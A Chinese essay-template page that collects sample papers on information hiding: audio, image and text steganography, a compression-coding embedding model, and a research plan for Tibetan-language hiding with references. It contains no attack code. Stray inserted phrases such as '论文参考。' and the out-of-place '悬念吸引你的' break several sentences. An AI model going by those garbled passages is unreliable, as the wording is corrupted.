在线客服

隐藏技术论文实用13篇

引论:我们为您整理了13篇隐藏技术论文范文,供您借鉴以丰富您的创作。它们是您写作时的宝贵资源,期望它们能够激发您的创作灵感,让您的文章更具深度。

隐藏技术论文

篇1

2、信息隐藏技术的防御攻击性

信息隐藏技术防御攻击的能力一定要很高,因为,网络通信中,信息技术会经常受到有意或无意的攻击,比如删除、非法攻击或篡改等,都会对隐藏的信息造成损害,因此,信息隐藏技术必须具备高的防御能力。此外,网络通信中经常出现信号处理,如调制、有损压缩、滤波等,也会对隐藏的信息造成破坏,所以,为了保障信息的安全,信息隐藏技术一定要拥有更强大的防御攻击的能力。

3、信息隐藏技术的嵌入量大

信息隐藏的目的是为了无法被其他人或电脑发现,为了提高信息隐藏的技术,要将需要隐藏的信息放入一个相对数据量大的载体中,因此,信息隐藏要选择一个信息量大的数据中。此外,还要满足隐藏算法所需要的空间,从而保证信息隐藏的无法识别,保证信息的安全。

4、信息隐藏技术的自我恢复

信息隐藏后一旦需要提取,要能够不需要原始载体信号,便可以从载体中将隐藏的信号提取出来,保证信息的完整。另外,将隐藏的信息提取出来后,要保证信息经过一系列的提取过程后,仍能保证信息的完好无损,有效保证信息的安全性。因此,信息隐藏技术必须要有高度的自我恢复能力。

二、网络通信中信息隐藏的技术途径

1、信息隐藏于音频信号中

将信息隐藏于音频信号中,是将嵌入信息所采用的域为依据,可将语音信息隐藏划分为时域音频隐藏、频域音频隐藏、离散余弦变换域音频隐藏三种。时域音频隐藏技术就是将音频信号的频率、幅度或结果进行处理,然后将其隐藏于音频信号中,是一种简单的隐藏技术。频域音频隐藏技术是将要隐藏的音频文件根据频域的区域进行处理,将需要隐藏的信息以伪噪声的方式嵌于音频信号中,从而达到隐藏的目的,并且很难被识别和发现。离散余弦变化域音频隐藏技术是需要隐藏的信息变换格式,再将变换后的信息嵌于音频信号中,起到深度隐藏的目的。此外,随着网络技术的发展和不断创新,音频信号隐藏还包括小波域隐藏技术和压缩域隐藏技术,效果都很好。

2、信息隐藏于图像信号中

信息隐藏于图像信号中主要有两种方式,一是空间域隐藏技术,就是利用空间替换法,将需要隐藏的信息替换到载体中,并且嵌入不重要的位置,例如将秘密信息嵌入像素点最低的有效位,实现信息的替换,从而保证信息的安全性;二是变换域隐藏技术,就是将需要隐藏的信息转换到变换域范围,变换域是一直在变动的,因此,秘密信息进入变换域后悔进行反复变换,从而使得信息隐匿其中,很难被发现。变换域隐藏技术相比于空间域隐藏技术拥有更好的隐藏效果,并且安全性高、防御攻击力强、自我恢复好,更适合信息的隐藏。

3、信息隐藏于文本信号中

信息隐藏于文本信息中,主要是将信息拆分为极其细碎的结构,然后将每个小部分分别隐藏于文本信息中,从而起到信息隐藏的目的。但是,文本信号需要庞大的数据量才能实现更好的信息隐藏,因此,在实际的应用中,应用率很低。此外,在网络通信中,音频信号隐藏技术和图像信号隐藏技术的隐蔽性远远好于文本信号,所以,文本信号隐藏信息的使用率低;同时,也由于文本信号的防御能力差、自我修复力也差,使得文本信号隐藏信息的安全性降低,不利于信息的隐藏。

篇2

信息隐藏是一门新兴的信息安全技术。论文参考。涉及感知学,信息论,密码学等多个学科领域,涵盖信号处理,扩频通信等多专业技术。 近年来得到了迅猛发展。现阶段人们一般选择图像、文本、音频和视频等数字媒体作为载体。另外, 还出现了基于TCP/IP 的信息隐藏技术和基于信道编码的信息隐藏技术。本文研究的基于压缩编码的信息隐藏技术是信息隐藏技术的新领域, 它以多媒体系统中的压缩数据作为嵌入载体,数据解压后不影响原始数据数据的结构和统计特性, 具有较强的鲁棒性和不可检测性。

2 压缩编码信息隐藏的原理

压缩编码是一种提高数据传输有效性的技术,它是通过对数据施加某种操作或变换使之长度变短或者容量变小的同时, 还必须保证原始数据能够从压缩产生的压缩码中得以精确的还原。从信息论的角度来看,压缩就是去掉信息中的冗余,即保留不确定的信息,去掉确定的信息(可推知的),也就是用一种更接近信息本质的描述来代替原有冗余的描述。这个本质的东西就是信息量(即不确定因素)。信息隐匿和数据压缩在本质上是相互联系的:对于数据压缩来讲,一块数据中隐匿了和数据本身无关的地的其它数据,那这块隐藏了信息的数据是有一定冗余的,由冗余的数据可以进一步被压缩,进一步压缩的就有可能去掉隐匿的数据;对于信息隐匿来说,一块已被压缩过的数据冗余量已经很小了,由于隐匿是嵌入的数据和原始数据毫无关系,在这块数据中进一步隐匿数据,势必造成原始掩护数据的有效数据的减少,相当于队已经压缩的数据进行进一步压缩。只要保证在接收端解压中可以恢复原始数据的差错率,就可以在压缩编码后进行信息隐匿,不会引起截获者怀疑码字载体中含有秘密信息。

3 压缩编码信息隐匿模型实现方案

基于信息隐匿和数据压缩的关系,提出结构如下的数据压缩思想的通用隐匿模型。模型主要由三个部分组成:图像压缩、信息加密和信息隐匿。图像压缩部分的量化器输出至信息隐匿部分,然后从信息隐匿部分得到隐藏有其他信息的量化数据,并送到熵编码器,其他内容和标准压缩过程一致。信息加密部分为传统的加密方案,其主要目的是增加秘密信息的安全性,使得系统隐匿的信息部分即使被检测出来,也不会泄露其内容。论文参考。

信息隐匿部分是模拟最核心的内容,这部分主要有三个部分组成:数据变换,数据选择和嵌入过程。数据变化的主要目的是改变加密后的信息统计特性,使得这些数据嵌入掩护图像量化后的数据之中,不改变或很少改变掩护图像的数据统计特性,从而使信息隐匿后的抗检测性大大增强。数据选择是从掩护图像量化后的数据中选择合适的比特位,用它来隐藏已加密的信息。合理的数据选择算法应该兼顾信息隐匿的容量,信息隐匿的抗检测性与鲁棒性。嵌入过程式将加密后的信息和选择出来的数据进行某种运算(通称为替换或异或),用运算结果替换选择出来的数据,并将此数据连同未选择出来的量化数据一并交给图像压缩部分的熵编码进行编码。

图1 基于数据压缩思想的通用信息隐匿模型

通用模型的秘密信息提取过程基本上是隐匿的逆过程,其流程图如下

图2通用信息隐匿模型的信息提取过程

压缩后的数据首先经过熵解码器解码,然后进行数据分离,将未嵌入的数据部分送入正常的图像解码流程(反量化,反映射变换),而将嵌入数据的部分进行数据提取,如果此过程的算法不是盲的(即需要原始掩护图像),则需要分离出来的数据和原始掩护图像经映射变化,量化后的数据进行运算,将结果进行数据恢复、解密、最后得到嵌入的原始秘密信息。

4 隐匿模型的两种关键技术

在这种通用的信息隐匿模型中,数据变换和数据选择是关键技术

数据变换的主要目的是改变加密后的信息统计特性,增强系统信息隐匿的抗检测性能。改变数据的统计特性的常用方法是进行线性滤波,从本质上来讲,线性滤波和线性变换是一致的,从频域上来看,滤波就是对信号频谱的不同部分进行不同的缩放。在技术上常就是这样一个过程:DFT→相乘→IDFT,将这一过程合并为一体时,就成为一个单纯的线性变换。在复数域中进行整数的可逆处理时,数据量就会增加一倍,为此可以经DFT换成DCT,这样这一处理过程就成为一实数域的线性变换问题。

下面介绍整型变换算法的基本过程。

(1)对于给定的线性变换A,如是常见的线性变换,则进行(2),否则对其进行改造,使det| A ‘ |=1。

(2)将A ‘ 分解为3类基本矩阵(置换矩阵,元素的绝对值均不小于1的对角阵,单位三角矩阵)。

(3)对于每一基本矩阵,构造其整型变换,获得整数输出。

(4)对于每一步都应有相应的逆变换,所以整个变换的逆变换可以相应的获得。

(5)对于多维可分离的线性变换,正变换可以逐维的计算;为了保证逆变换对于多维数据的完全重建,应严格按照和正变换相反的次序进行逆变换。

实现数据变换时的另一个问题是数据的范围问题。在实际处理过程中,输入的数据都是有一定的范围的(比如原始图像数据通常用8位无符号数据表示),如果输出的数据不加以限制,则输出的数据的范围一般要增大,这样就必须用更多的数据表示处理结果。

数据选择过程是从掩护图像的量化数据中选择合适的比特位,用它来隐匿已加密的信息。最基本的做法是选择掩护数据中的不重要的部分,这样做得优点是对掩护图像的质量影响最小,使修改引起别人注意的可能性最小。但是在实际系统中,数据选择算法应该兼顾信息隐匿的容量,信息隐匿的抗检测性与鲁棒性等多个方面的性能,可以选择下面三种。

1.LSP(LeastSignificant Portion)最不重要部分

LSP技术和LSB(最不重要比特位)技术基本类似,区别在于LSB平等的对待掩护图像中的每一字节,不同的字节之间没有区别,在隐藏时都在数据的最低位取相等比特;而LSP针对变换量化后的数据而言,不同位置的重要程度不同,从中所取的最低有效比特数就不同,其中低频数据是取得少一些,而在高频数据中取得多一些。另外,不同位置的数据取值范围也不一样,最多的可取比特数也不一样。论文参考。

2.随机间隔法

随机间隔技术是以LSP为基础的一种方法,在数据选择时用一个掩密密钥k作随机数发生的种子,那么可以生成一个随机序列k 1 ,…,k l ,并且把它们一起按下列方式生成隐匿信息位置来对经LSP选择的数据进行进一步选择:j 1 =k 1

j i =k i +j i-1

从而可以伪随机决定两个嵌入位置的距离。这种方法由于隐匿的位置更少,所以更不容易被检测出来。

3.随机位置法

随机位置技术是另外一种伪随机的方法,它也以LSP技术为基础。和随机间隔法不同的是,它对不同的位置变换数据及量化数据的不同比特位赋予不同的选择概率p 1 ,…,p l ,在数据选择时也用一个伪装密钥k作为随机发送的种子,那么可以生成一个一个随机序列k 1 ,…,k l ,当k i ≥p i 时选择比特,否则不进行选择。在此方法中选择合适概率取值方案可以兼顾信息隐匿的容量、悬念吸引你的抗检测性与鲁棒性等多方面的性能,是一种更灵活的方法。当然可以将随机间隔法和随机位置发结合起来使用,那是一种更灵活、更复杂的方案。

5 实验结果

运用本文提出的通用模型,以lena(512像素×512像素),作为掩护图像,在其中隐匿随机数据,映射变换采用8×8的DCT,经数据变换过程,结果如下图所示。图中从左到右,从上到下依次为:原始图像,未嵌入数据的JPEG图像,嵌入不等数据量的JPEG图像。随着嵌入数据量的增加,掩护图像的直观质量会下降,这种质量的下降类似于不同压缩比条件下JPEG图像质量的不同下降,从信息隐匿的角度来看,这种相似性是有利的。

图3 图用模型的数据隐匿效果

6 小结

研究了一种基于压缩编码的信息隐匿技术,介绍了信息隐匿通用模型的两种关键技术:数据变换和数据选择技术,通过实验得到嵌入量与图像质量的关系。随着通信技术的不断发展,信息安全将成为一门很重要的学科,对于通信信息隐匿还要寻找更先进,更合理的算法来达到通信的安全性能。

参考文献:

[1] KATZENBEISSERS, PETITCOLASFAP.信息隐藏技术—隐写术与数字水印[M].吴秋新,钮心忻,杨义先等译.北京:人民邮电出版社,2001.

[2] 汪小帆,戴跃伟. 信息隐藏技术方法与应用[M].北京:机械工业出版社,2001.

[3]柏森,胡中豫,吴乐华等.通信信息隐匿技术[M].北京:国防工业出版社,2005.

篇3

0 引 言

安全、有效的信息传输对国家安全、社会稳定和人民安居乐业至关重要。网络和多媒体技术的发展,使得信息传输的速度和数量正以惊人的增量发展。然而,信息传输的便利在方便人们的同时也给信息安全带来了隐患,同时也为基于数字载体的秘密信息传输提供了广阔的研究空间。目前,基于载体的秘密信息传输是信息安全领域的一个方兴未艾的研究热点。而基于载体预处理的藏文信息隐藏技术将为信息安全领域提供一些新的数字信息共享和传输理念,特别是藏文的预处理规律、在数字信息中的隐藏规律等,将有助于涉藏秘密通信技术的发展,并可以对民用和商用领域中涉及到藏文内容的传输、共享、存储和提取的通信过程起到安全保护、版权保护及完整性认证的作用,并对国家涉藏领域的网络舆情监控、国内外涉藏敏感信息标注和情感色彩认知起着至关重要的作用。

在藏文信息隐藏技术方面,目前主要涉及的技术有关键字识别、字符识别和提取、韵律认知、语义角色标注、文本资源挖掘和语料抽取等,并以此为基础进行置乱优化。

1 国内外信息隐藏技术研究现状

信息隐藏一直是信息安全领域中保障隐秘信息安全传输和数字信息版权的重要手段,也是近年来国内外学者研究的热点之一。最新的一届ACM信息隐藏和多媒体安全会议(ACM IH&MMSec’13 Workshop)的主要研究内容有信息隐藏算法、多媒体水印和认证、载体运算域的数字信号处理等。其中,信息隐藏算法的设计首先依赖于载体的选择和预处理;关于多媒体水印和认证的研究则将信息隐藏和数字水印的载体范围从数字图像等常见载体拓展到了包括三维模型在内的新型载体上;载体运算域的数字信号处理涉及到了载体预处理时所用的具体方法,如空间域或变换域等。2013年IEEE 图像处理国际会议(IEEE ICIP 2013)的主要研究内容包括图像、音视频和3-D等多媒体的信息隐藏算法和多媒体特征提取和分析等,这两类研究内容均与载体的选取和预处理有关。最新一届信息隐藏国际会议(IH2012)的主要研究内容包括多媒体安全和其他载体的信息隐藏。我国的第十一届全国信息隐藏暨多媒体安全学术大会(CIHW2013)中关于信息隐藏算法的研究内容也主要集中在非常规载体的分析和预处理上。

藏文作为信息隐藏领域一种新的信息格式,对其研究主要局限于藏文操作系统、藏文信息技术标准、藏文信息处理等几个方面[1],具体内容集中在藏文编码字符集、术语集、拼音辅助集等的建立。

基于载体的秘密通信技术是20世纪90年代中期发展起来的跨领域的学科,而载体的预处理技术一直是其研究的主要方向。对隐藏载体进行预处理,生成信息隐藏嵌入区域是信息隐藏算法中最重要的研究内容之一。从上述国内外各学术会议中关于信息隐藏的参会论文和研讨情况看,各类载体固有特性的研究对预处理技术有着重要的意义,且数字图像依然是主要的一类载体,而三维模型将是未来主要研究的一类非常规载体。下面就对数字图像和三维模型两类载体的预处理技术的研究现状进行阐述。

1.1 数字图像预处理技术研究综述

基于数字图像的信息隐藏技术是信息隐藏学科中重要的技术分支,是目前应用最广、覆盖范围最大的信息隐藏技术手段。在基于数字图像的信息隐藏技术研究中,信息隐藏区域的生成是关系算法性能的重要因素。信息隐藏区域的生成方法主要包括空间域生成法、变换域生成法以及空间域和变换域联合的生成方法。

空间域算法:作为空间域算法中出现最早、操作最简单且应用最广泛的算法,基于位平面分解理论的LSB算法可以直接替换的方式隐藏较大的数据量,刘红翼等提出的一种LSB算法具有容量大、运算量小的特点[2];刘文彬等提出的LSB隐写替换的消息定位方法则可以对此类算法进行检测[3];而IH2012的论文中,有学者运用假设检验理论和含秘载体的奇偶感知特性可有效地检测LSB算法所隐藏的隐秘信息[4,5],这些研究为藏文信息隐藏中涉及到关于此类算法的抗检测性研究提供了新的待改进方向。张焱等提出的像素值排序和赵彦涛等提出的直方图修改等空间域算法在沿用LSB直接替换的隐藏理念的同时,还提升了鲁棒性,因此也被广泛用于数字图像载体预处理[6,7];随后,杨春芳等提出了针对此类算法的检测方法[8],这也为针对此类算法抗检测性改进的研究提供了重要依据。此外,上述同类算法中的载体子区域划分思想、内容自适应思想等也对本项目基于载体结构特性建立空间匹配模型的机制提供了方法学上的有力支持[9-13]。

变换域算法:不同于空间域算法直接对载体的空间特性进行修改,变换域预处理方法以修改载体的频率参数来隐藏信息[14],因此算法的鲁棒性比空间域算法好。在此基础上,唐燕等又对隐秘信息的检测和恢复进行了研究和改进,实现了几乎无需原始参量的半盲提取[15]。尽管变换域算法不具备空间域算法容量大、运算量小和易操作等优势,但是变换域中的多小波理论因其同时具有对称性、短支撑性、二阶消失矩和正交性等特性成为了信号处理中有明显优势且较常用的方法,在前期研究中利用多小波方法将数字图像载体分块后作为嵌入区域,提高了算法的鲁棒性和不可见性[16,17],这种方法为在藏文信息隐藏研究中建立基于区域能量的阶梯性分布机制提供了一种研究手段。

混合域算法:较单独运用一种空间域或变换域生成隐藏区域并设计信息隐藏算法来看,基于空间域与变换域联合的信息隐藏算法可以兼有多种算法的性能优势。在基于空间域和变换域联合的信息隐藏算法中,空间域的作用体现在数据嵌入的具体操作方面,因为隐藏的实质就是在当前环境下的空间分量上进行数据修改,利用边缘像素值差分(Edged Pixel Value Differencing,EPVD)将载体换算为若干个像素块,以最大斜角的数据修改作为信息隐藏的具体方法[18];利用湿纸码和基于LSBM的双层隐写来对载体进行加1嵌入或减1嵌入[19];另外,国内外许多学者利用调色板理论进行数据嵌入[20,21]。而变换域在载体预处理中的主要作用是生成满足特定需要的信息隐藏环境(区域),主要包括变换后的系数分布以及n阶分量子图等。如对RSV颜色空间的V分量做DCT变换,分块后作为嵌入区域[22];利用视觉显著点技术确定跟踪窗(Regions of Interest,ROI),在ROI的DCT系数上嵌入隐藏信息,并指定某个ROI边缘地图脆弱性标识,嵌入到DWT变换后的含密图像中[23];前期研究中,研究人员利用自适应颜色迁移理论中lαβ域对颜色的控制力,消除了RGB颜色分量的强相关性,并结合GHM能量分区隐藏信息,在不可见性、嵌入信息量和鲁棒性方面均具有较好的表现[24]。

1.2 三维模型预处理技术研究综述

潘志庚等将基于三维模型的信息隐藏预处理方法主要分为空间域算法和变换域算法[25]。这也这为藏文信息隐藏研究提供了新的思路和方法。

空间域算法:空间域算法通常具有易嵌入和盲提取的特点,如直接置换载体的几何信息来隐藏数据是三维模型载体信息隐藏最原始、最直接的方法[26]。为改进此类算法的鲁棒性,引入仿射不变量是有效的措施,如利用具有连续解析性的仿射不变量优化需要置换的顶点[27]、 将稳态锚点通过三角垂心编码解析为聚类元素从而嵌入隐秘信息[28]。此外,基于主元分析的算法也有助于改善空间域算法的鲁棒性,例如可根据主元分析(Primary Component Analysis,PCA)来确定模型的关键位置作为鲁棒区域,并用网格分割法改进鲁棒性和不可见性[29-32]。这类算法也为藏文信息隐藏从载体结构特性进行解析和预处理提供了理论依据。改进型的空间域算法多针对鲁棒性或容量性有所提升,如基于连续解析性的体积矩的盲算法,改善了之前算法对连通性攻击的鲁棒性[33];通过重排顶点和面片在网格文件中的表示信息,利用表示域内的信息进行嵌入使算法具有良好的不可见性和大容量性[34],但对相似变换以外的攻击不具有鲁棒性。

变换域算法:三维模型预处理的变换域方法大多利用频谱分析将模型信息参数化[35],对参数进行少量修改后以隐藏信息,其中,基于小波变换的算法可以对规则和非规则网格模型进行小波域参量修改以嵌入较多信息[36]。理论上,变换域算法比空间域算法鲁棒性强,但由于三维模型顶点的天然无序性和不规则性,对其进行频谱分析难度大,导致变换域算法实用性目前较低,因此空间域算法依然是比变换域算法更有实用价值的研究方向[37]。

2 藏文信息隐藏技术研究现状

目前反映藏文信息处理技术最新进展的文献较少,综合以已有的研究成果及相关研究文献,藏文信息处理可划分为藏语信息处理和藏字信息处理两个层次[38,39]。藏语信息处理包括机器翻译、信息检索、信息提取、文本校对、文本生成、文本分类、自动摘要以及藏文字识别和语音识别的后处理等等;而藏字信息处理包括操作系统以及编码字符集、输入技术、字形描述与生成、存储、编辑、排版、字频统计和藏字属性库等。这些研究基础对藏文信息隐藏技术的发展至关重要,是基于载体预处理的藏文信息隐藏的主要技术来源。鉴于藏文的独特构造,以及藏文的特点,目前对藏文秘密信息的预处理技术一般指置乱和加密算法的选择[40],而置乱使信息变得杂乱无章难以辨认,可以起到加密与改变信息嵌入特性的作用。可用于藏文信息隐藏的置乱算法主要有Arnold变换、幻方矩阵、Gray码变换、混沌序列等方法[41]。其中,Arnold变换算法简单且置乱效果显著,使有意义的数字图像变成像白噪声一样的无意义图像,实现了信息的初步加密和信息结构的调整,在嵌入信息为数字图像时可以很好的应用[42]。幻方置乱的思想基于查表思想,基于数字图像的幻方置乱可降低幻方置乱阶数或以图像块进行置乱,实现置乱效果与系统开销的平衡[43]。Gray是一种具有反射特性和循环特性的单步自补码,它的循环、单步特性消除了随机取数时出现重大误差的可能,它的反射、自补特性使得求反非常方便[44]。混沌的优势在于对初始条件的极端敏感和轨迹在整个空间上的遍历性。根据经典的Shannon置乱与扩散的要求,这些独特的特征使得混沌映射成为信息隐藏嵌入算法的优秀候选[45]。上述传统的置乱算法一般用于正方形图像处理,而经过改进的Arnold算法可直接用于宽高不等的矩形图像而不必进行正方形扩展[46],这也将是藏文信息隐藏技术所采用的主要置乱方法之一。

3 藏文信息隐藏技术的研究目标、研究内容和要解决的问题

3.1 研究目标

面向藏文安全通信的高性能信息隐藏算法是目前藏文信息隐藏技术的主要目标,包括提出性能出色的、适合藏文通信要求的信息隐藏算法;提出一种具有普适性的高性能信息隐藏嵌入区域生成原则和嵌入规则:

(1) 基于数字图像的藏文信息隐藏算法:提出至少两种基于数字图像的藏文信息隐藏算法,算法将同时满足面向藏文安全的信息隐藏应用所要求的高不可见性(PSNR≥34.90dB)、强鲁棒性(抗击大约69%以下的JPEG2000压缩、35%以下的剪切及常见滤波与加噪)、大容量性(基于彩色图像的信息隐藏信息嵌入率≥18%)以及高感知篡改性(检测隐藏数据是否被篡改能力≥95%)。

(2) 基于三维模型的藏文信息隐藏算法:提出至少一种基于三维模型的藏文信息隐藏算法。算法将同时满足面向藏文安全的信息隐藏应用所要求的高不可见性(RSNR≥69.94dB、En≥70%)、应对一般攻击的强鲁棒性(抗击大约0.10%随机加噪、50-times Laplacian平滑、50%均匀重网格化以及均匀简化等)、大容量性(相对理想的RSNR,嵌入率≥29%)以及低复杂度(根据载体模型几何信息量而变化)。

(3) 普适性信息隐藏嵌入区域生成原则和嵌入规则:利用载体图像能量和复杂度特性,提出基于能量性和复杂度的藏文信息隐藏区域生成原则和嵌入规则,将适应于所有对数字图像处理后有能量区别的图像处理方法,指导设计者利用能量与鲁棒性、复杂度与不可见性的对应关系,研究出同时满足不可见性和鲁棒性的信息隐藏算法。

3.2 研究内容

(1) 藏文信息隐藏区域生成原则与规则研究:数字图像信息隐藏技术的研究核心集中在隐藏区域和嵌入规则的设计上,藏文信息隐藏算法的设计方法和思路就是在选定藏文信息隐藏区域以及制定好信息隐藏规则后,按照一定的顺序将两者进行合理的组织,所以研究藏文信息隐藏区域生成原则以及信息隐藏规则是重点。

(2) 基于数字图像的藏文信息隐藏算法研究:隐藏算法是基于数字图像的信息隐藏技术的研究核心,需按照嵌入域进行划分,对基于空间域和基于变换域的信息隐藏算法分别进行研究,提出单独基于空间域、单独基于变换域以及两者联合应用的数字图像信息隐藏算法。

(3) 基于三维模型的藏文信息隐藏算法研究:首先对三维模型的结构特性和能量特性进行研究,再根据载体模型的特性找出对应的预处理方法。在研究基于空间域和基于变换域的信息隐藏算法的基础上,提出改进型的三维模型信息隐藏算法。主要用于提升载体有效嵌入容量和降低载体视觉失真度。

(4) 载体与藏文秘密信息的一致化方法研究:基于上述研究基础,生成结构和能量差异化子区域,再将藏文秘密信息按照拼音属性进行解析生成信息序列。再利用优化算法使得预处理后的载体信息和藏文秘密信息的解析编码获得最大一致化,从而提高算法性能。

3.3 需解决的关键问题

综合已有的研究,在藏文信息隐藏技术方面,目前需要解决的问题有以下几个方面:

(1) 信息隐藏区域与嵌入规则设计:在具有什么性质的区域内应用什么样的规则进行藏文信息隐藏才可以解决“不可见性与鲁棒性的对立、容量性与抗分析性的对立”问题,是藏文信息隐藏研究领域的关键技术之一。需找出隐藏区域的性质与信息隐藏性能的关系,提出面向藏文信息传输的信息隐藏区域选择的原则与方法;给出在具有具体性质的嵌入区域中的藏文信息隐藏嵌入规则的制定原理和方法;提出大量的藏文信息数据转换思想与方法,以提供形式多样的信息隐藏嵌入规则。

(2) 数字图像载体预处理方法:①多小波理论在载体预处理中的应用。对于数字图像经过多小波变换后所具有的特殊性质,找出多小波变换后数字图像所具有的能量特性与基于数字图像信息隐藏算法性能之间所遵循的规律已有学者进行研究。②颜色空间的性能分析与应用选取。RGB、CMYK、lαβ、YUV以及HSx颜色空间,应用方法以及应用各有优劣势。该技术的应用难点在于为颜色空间在藏文信息隐藏的应用提出完备的应用方案,因为这些颜色空间在藏文信息隐藏技术中的应用目前非常少,应用优劣还处于实验验证阶段,没有理论验证的支持。

(3) 三维网格模型载体预处理方法:骨架抽取和内切球解析技术在藏文信息隐藏算法中的应用。这种方法不涉及顶点数量及坐标的改变和拓扑关系的修改。难点在于寻找一个理想的仿射不变量作为辅助参数以弥补算法对缩放攻击的脆弱性。

(4) 藏文的置乱与遗传优化算法:有的藏文字处理系统把藏文看成是由30个辅音、4个元音、3个上加字、5个下加字共42个藏文字符组成的,而有的则认为由其他数量的字符组成。基于对藏文中加字对发音的影响规律的研究,利用字符与二进制码的解析规则和置乱与优化技术对信息置乱,达到隐藏信息与载体信息的最大匹配度也是一个技术难点。

4 藏文信息隐藏技术研究的新方法

(1)利用载体图像能量和复杂度特性,提出基于能量性和复杂度的藏文信息隐藏区域生成原则和嵌入规则。高能量与强鲁棒、高复杂度与高不可见性的对应关系,从根本上解决藏文信息隐藏算法中不可见性和鲁棒性的对立问题,为面向藏文通信安全的信息隐藏算法的设计给出一种普适性方法。

(2)根据数字图像信息隐藏嵌入区域的生成原则和嵌入规则,提出新的、高性能的数字图像的藏文信息隐藏算法。算法利用lαβ等颜色空间转换以及多小波对载体图像进行的处理,生成具有不同能量特性的嵌入区域,从频率域上满足藏文信息隐藏的应用要求;通过对载体图像进行颜色迁移、矢量解析以及环形处理,从数字图像的空间结构上满足藏文信息隐藏的应用要求。

(3)提出满足三维模型结构特性和能量特性的藏文信息隐藏算法。算法利用局部高度理论和均值偏移理论对载体模型进行预处理,生成具有不同能量特性的嵌入区域,从频域上满足信息隐藏的应用要求;通过对载体图像进行骨架抽取、内切球解析,从空间结构上满足藏文信息隐藏的应用要求。

参考文献

[1]陈玉忠,俞士汶. 藏文信息处理技术的研究现状与展望[J]. 中国藏学. 2003(4):97-107.

[2]刘红翼,王继军,韦月琼,等.一种基于LSB的数字图像信息隐藏算法[J].计算机科学,2008, 35(1):100-102.

[3]刘文彬,刘九芬.一种针对LSB替换隐写的消息定位方法[J].信息工程大学学报,2013,14(6):641-646.

[4] R. Cogranne, C. Zitzmann, F. Retraint,et al. Statistical Detection of LSB Matching Using Hypothesis Testing Theory[C].In: Proceedings of the 14th International Conference on Information Hiding,2013.

[5] J. Fridrich, J. Kodovsky. Steganalysis of LSB Replacement Using Parity-Aware Features[C]. In: Proceedings of the 14th International Conference on Information Hiding, 2013.

[6] 张焱,张敏情,瓮佳佳.基于直方图对的大容量信息隐藏算法[J].计算机应用研究,2013,30(7):2108-2111.

[7] 赵彦涛,李志全,董宇青.基于排序和直方图修改的可逆信息隐藏方法[J].光电子.激光,2010,2(1):102-106.

[8] 杨春芳,刘粉林,罗向阳.基于相对熵的直方图差异与JPEG隐写的定量分析[J].计算机研究与发展, 2011,48(8):1563-1569.

[9] 熊志勇,王江晴.基于差分直方图平移的彩色图像可逆信息隐藏[J].四川大学学报,2011,43(3): 81-89.

[10] Z.H. Wang, C.F. Lee, C.Y. Chang. Histogram-shifting-imitated reversible data hiding[J]. The Journal of Systems and Software, 2013,86(2): 315-323.

[11] X.L. Li, J. Li, B. Li, et al. High-fidelity reversible data hiding scheme based on pixel-value-ordering and prediction-error expansion[J].Signal Processing,2013, 93(1): 198C205.

[12] X.T. Wang, C.C. Chang, T.S. Nguyen, et al. Reversible data hiding for high quality images exploiting interpolation and direction order mechanism[J]. Digital Signal Processing, 2013,23(2): 569C577.

[13] Nabin Ghoshal, Anirban Goswami, H. S. Lallie. Adaptive Steganography for Image Authentication Based on Chromatic Property[C]. In: Proceedings of the International Conference on Frontiers of Intelligent Computing: Theory and Applications (FICTA),2013.

[14]和红杰,张家树.对水印信息篡改鲁棒的自嵌入水印算法[J].软件学报,2009,20(2):437-450.

[15] 唐燕,闾国年,殷奎喜.规范类正交矩阵的信息隐藏算法[J].东南大学学报,2013,43(1):45-49.

[16] T. Zhang, D.J. Mu, S. Ren, et al. Study of reversible information hiding scheme based on CARDBAL2 and DCT[C].Proceedings-2010 3rd IEEE International Conference on Broadband Network and Multimedia Technology (IC-BNMT2010),2010.

[17] T. Zhang, D.J. Mu, S. Ren. A Confidential Communication-Oriented Information Hiding Algorithm based on GHM multi-wavelet and DCT[J].Applied Mathematics & Information Sciences,2013, 7(5): 1803-1807.

[18] H.B. Kekre, P. Halarnkar, K. Dhamejani. Capacity increase for information hiding using maximum edged pixel value differencing[J].Communications in Computer and Information Science,2011, 145(1): 190-194.

[19] 奚玲,平西建,张韬.整数小波域湿纸码自适应信息隐藏算法[J].计算机辅助设计与图形学学报,2011,2(7):1217-1223.

[20] H. Zhao, H.X. Wang, M.K. Khan. Steganalysis for palette-based images using generalized difference image and color correlogram[J].Signal Processing, 2011,91(11): 2595-2605.

[21] A. Lamgunde, A. Kale. Palette based technique for image steganography[J].Communications in Computer and Information Science, 2011,125(2): 364-371.

[22] Y.J. Qiu, H. T. Lu, N. Deng, et al. A robust blind image watermarking scheme based on template in Lab color space[C].2011 International Conference on Computing, Information and Control(ICCIC 2011),2011.

[23] L.H. Tian, N.N. Zheng, J.R. Xue, et al. An intergrated visual saliency-based watermarking approach for synchronous image authentication and copyright protection[J].Signal Processing:Image Communication,2011,31(2): 9-64.

[24] 任帅,张|,慕德俊,等.基于GHM多小波与自适应颜色迁移的信息隐藏算法研究[J].西北工业大学学报,2010,28(2):64-269.

[25] 潘志庚, 孙树森, 李黎.三维模型数字水印综述[J].计算机辅助设计与图形学学报,2006,18(8):1103-1110.

[26] S.H. Lee, K.R. Kwon. VRML animated model watermarking scheme using geometry and interpolator nodes[J].Computer-Aided Design,2011,43(8): 1056-1073.

[27] M. Luo, A.G. Bors. Surface-preserving robust watermarking of 3-D shapes[J].IEEE Transactions on Image Processing, 2011,20(10): 2813-2826.

[28] L. Du, X.C. Cao, M.H. Zhang, et al. Blind Robust Watermarking Mechanism Based on Maxima Curvature of 3D Motion Data[C]. In: Proceedings of the 14th International Conference on Information Hiding,2013.

[29] Z.Q. Yao, R.J. Pan, F.H. Li, et al. A mesh partitioning approach for 3D mesh oblivious watermarking[J].Chinese Journal of Electronics, 2010,19(4): 651-655.

[30] S. Cai, X.K. Shen. Octree-based robust watermarking for 3D model[J].Journal of Multimedia, 2011,6(1): 83-90.

[31] S. Cai, X.K. Shen. OTP-W:Octree partition-based 3D mesh watermarking[C].Second International Workshop on Education Technology and Computer Science,2010.

[32] 廖学良,王屏.一种新的三维模型水印嵌入空域算法[J]. 计算机学报,2008, 31(10): 1848-1856.

[33] K. Wang, G. Lavouéa, F. Denisb, A. Baskurt. Robust and blind mesh watermarking based on volume moments[J].Computers & Graphics,2011, 35(1): 1-19.

[34] I.L. Chung, C.M. Chou, D.C. Tseng. Hiding data in triangle meshes by rearranging representation order[J].International Journal of Innovative Computing, Information and Control,2011, 7(6): 3419-3435.

